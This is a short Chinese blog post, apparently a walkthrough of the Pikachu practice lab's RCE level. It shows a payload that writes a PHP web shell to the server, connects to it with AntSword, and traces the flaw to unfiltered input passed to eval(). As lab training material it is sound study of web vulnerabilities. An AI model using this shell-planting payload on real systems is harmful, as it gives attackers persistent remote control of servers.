[PiKaChu靶场通关]RCE远程代码执行(下)

简介: [PiKaChu靶场通关]RCE远程代码执行

五、上马上马

payload:fputs(fopen(‘shell.php’,‘w’),’<?php assert($_POST[fin]);?>’);

image.png

到本关目录下查看,多了一个马

image.png

蚁剑链接一下

image.png

image.png

查看一下漏洞原因,用户输入没过滤就直接传到eval()函数里面去了

image.png

相关文章
|
27天前
|
安全 网络安全 数据安全/隐私保护
|
27天前
|
XML 安全 JavaScript
|
10月前
|
安全 Windows
QQ远程代码执行漏洞复现
QQ远程代码执行漏洞复现
294 0
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
Windows
pikachu靶场通关秘籍之命令执行攻击
pikachu靶场通关秘籍之命令执行攻击
103 0
|
XML 安全 数据格式
pikachu靶场通过秘籍之XXE漏洞攻击
pikachu靶场通过秘籍之XXE漏洞攻击
134 0
|
PHP
pikachu靶场通关秘籍之文件包含攻击
pikachu靶场通关秘籍之文件包含攻击
95 0
|
SQL 安全 关系型数据库
pikachu靶场通关秘籍之sql注入攻击
pikachu靶场通关秘籍之sql注入攻击
300 0
|
安全 PHP
pikachu靶场通关秘籍之文件上传攻击
pikachu靶场通关秘籍之文件上传攻击
257 0
pikachu靶场通关秘籍之越权攻击
pikachu靶场通关秘籍之越权攻击
209 0